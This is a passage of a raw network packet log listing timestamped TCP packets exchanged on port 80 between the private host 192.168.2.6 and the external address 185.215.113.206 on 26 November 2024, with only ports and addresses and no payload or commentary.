Nov 26, 2024 00:25:18.500065088 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.500161886 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.500212908 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.501162052 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.501173019 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.501230001 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.502060890 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.502115011 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.502283096 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.503104925 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.503154993 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.503206968 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.503911972 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.504153013 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.504225016 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.504271984 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.505234003 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.505316019 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.505364895 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.506181955 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.506236076 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.506278038 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.507381916 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.507394075 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.507441998 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.508227110 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.508294106 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.508372068 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.509234905 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.509289980 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.509365082 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.510266066 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.510318041 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.510379076 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.511499882 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.544277906 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.544290066 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.544394016 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.544491053 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.544603109 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.544619083 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.545579910 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.545603991 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.545639992 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.545715094 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.546672106 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.546698093 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.546752930 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.547579050 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.547748089 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.547802925 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.548559904 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.548654079 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.548703909 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.549604893 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.549669027 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.549720049 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.550653934 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.550709009 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.550739050 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.551762104 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.551801920 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.551826954 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.551856041 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.552692890 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.552768946 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.552860975 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.553708076 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.553785086 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.553836107 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.554718018 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.554819107 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.554879904 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.555763960 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.555840015 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.555876970 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.556466103 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.556780100 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.556812048 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.556850910 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.556873083 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.619924068 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.620044947 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.620086908 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.620122910 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.620440006 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.620524883 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.620559931 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.620623112 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.621388912 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.621443987 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.621509075 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.621563911 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.622420073 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.622472048 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.622519970 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.622577906 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.623444080 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.623552084 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.623611927 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.624532938 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.624587059 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.624636889 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.624697924 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.625650883 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.625664949 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.625708103 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.626653910 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.626729965 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.626753092 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.626821041 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.627542019 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.627600908 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.627645969 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.627729893 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.628562927 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.628623009 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.628691912 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.628819942 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.629578114 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.629633904 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.629663944 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.629714966 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.630949020 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.630961895 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.631021023 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.631678104 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.631730080 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.631742954 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.631794930 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.632858992 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.632936954 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.632966995 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.633112907 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.633675098 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.633724928 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.633760929 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.633836031 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.634707928 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.634769917 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.634813070 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.634881973 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.635731936 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.635791063 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.635858059 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.635931969 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.636733055 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.636789083 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.636852026 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.636936903 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.637765884 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.637823105 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.637847900 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.637939930 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.639000893 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.639013052 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.639066935 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.640106916 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.640119076 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.640160084 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.640809059 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.640877962 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.640934944 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.640985012 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.641844988 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.641927958 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.641958952 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.642034054 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.642843008 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.642903090 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.695868969 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.695964098 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.696011066 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.696043015 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.696317911 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.696377039 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.696510077 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.696562052 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.697751999 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.697763920 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.697814941 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.698381901 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.698442936 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.698474884 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.698525906 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.699423075 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.699477911 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.699529886 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.699583054 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.700418949 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.700472116 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.700520039 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.700567961 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.701421976 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.701478004 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.701540947 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.701594114 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.702466965 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.702517033 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.702770948 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.702824116 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.703488111 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.703543901 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.703597069 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.703646898 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.704514027 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.704570055 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.704648972 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.704701900 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.705698013 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.705749035 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.705862045 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.705915928 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.706636906 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.706708908 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.706809044 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.706861019 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.707706928 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.707729101 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.707787991 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.707787991 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.708591938 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.708643913 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.708667994 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.708725929 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.709618092 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.709675074 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.709758997 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.709819078 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.711090088 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.711102009 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.711150885 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.711680889 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.711738110 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.711760998 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.711889029 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.745543003 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.745556116 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.745568037 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.745654106 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.745798111 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.745903015 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.746737003 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.746769905 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.746803045 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.746835947 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.748079062 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.748094082 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.748133898 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.748155117 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.749106884 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.749120951 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.749165058 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.749663115 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.749716043 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.749753952 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.749861956 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.750679016 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.750740051 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.750770092 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.750813961 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.751724005 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.751781940 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.752051115 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.752103090 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.752763033 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.752815008 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.752896070 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.752943993 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.753782034 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.753834963 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.753935099 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.753983021 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.754863977 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.754899979 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.754918098 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.754957914 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.755821943 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.755884886 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.755938053 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.755995035 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.756824017 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.756875992 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.756903887 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.756952047 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.757879019 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.757932901 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.758008003 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.758068085 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.821388006 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.821434021 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.821568012 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.821650028 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.821650028 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.821681976 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.821723938 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.821738958 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.822573900 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.822669029 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.822704077 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.822850943 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.823694944 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.823772907 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.823832989 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.824637890 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.824760914 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.824820995 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.825989962 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.826003075 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.826164007 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.826728106 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.826791048 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.826853037 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.826913118 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.827969074 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.827989101 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.828023911 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.828047037 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.828727961 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.828778028 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.828787088 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.828824043 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.829755068 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.829809904 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.830020905 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.830074072 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.830768108 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.830820084 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.830894947 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.830945969 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.831798077 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.831873894 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.831901073 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.831952095 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.833023071 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.833034039 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.833080053 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.833843946 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.833897114 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.833933115 CET	80	49715	185.215.113.206	192.168.2.6
